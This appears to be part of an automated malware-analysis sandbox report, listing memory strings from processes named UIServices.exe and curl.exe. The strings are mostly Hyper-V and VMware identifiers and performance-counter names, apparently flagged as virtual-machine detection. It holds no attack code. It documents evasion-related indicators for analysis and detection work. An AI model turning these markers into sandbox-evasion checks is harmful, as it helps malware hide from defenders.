Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service/
Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: UIServices.exe, 00000039.00000003.437083705.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436830567.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436514987.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: % Idle Time5280Total Interrupts/sec5182Hyper-V Hyperviso
Source: UIServices.exe, 00000039.00000002.456580327.0000018E5A66F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8258RemoteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service!
Source: UIServices.exe, 00000027.00000003.325370471.0000029C1E244000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401935244.0000027DB6E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8258RemoteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: UIServices.exe, 00000027.00000003.323667575.0000029C1E251000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.437051619.0000018E5A626000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus#{
Source: UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus PipesOc
Source: curl.exe, 0000000E.00000002.265338006.00000237F57CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical ProcessorH
Source: UIServices.exe, 00000039.00000002.456342969.0000018E5A629000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8258RemoteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/secg
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partitione
Source: UIServices.exe, 00000027.00000003.323552275.0000029C1E207000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.323297174.0000029C1E207000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications
Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor2
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service=UJa
Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes]G~Q
Source: UIServices.exe, 00000027.00000002.342535670.0000029C1C57B000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340784828.0000029C1C575000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336592757.0000029C1EB1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus PipesQ`
Source: UIServices.exe, 00000027.00000003.335379625.0000029C1E499000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CXowsstore_8wekyb3d8bbwe\AC\INetCookies\ESE\acturerName=&smBiosManufacturerName=VMware%2C+Inc.&phoneDeviceModel=&smBiosDm=VMware7%2C1
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Provider Pipesq
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical ProcessorA
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partition
Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes=D
Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: UIServices.exe, 00000039.00000003.437083705.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436830567.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436514987.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t5282Hyper-V Hypervisor Root Partition5284Virtual Proces
Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical ProcessorV
Source: UIServices.exe, 00000027.00000002.342535670.0000029C1C57B000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340784828.0000029C1C575000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336592757.0000029C1EB1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service^`
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Provider PipesLy
Source: UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor$
Source: UIServices.exe, 00000039.00000002.455383437.000000806CD4A000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: VMWare@
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical ProcessorT
Source: curl.exe, 00000009.00000003.257996903.000001778212F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.258236371.0000017782132000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor-B
Source: UIServices.exe, 00000027.00000003.327346477.0000029C1E76D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d
Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor4
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Provider Pipes
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&&n9
Source: UIServices.exe, 0000002F.00000003.379294802.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.379026905.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec
Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Provider PipesU
Source: UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus Provider Pipes
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual ProcessorZy
Source: UIServices.exe, 00000039.00000002.455383437.000000806CD4A000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processor
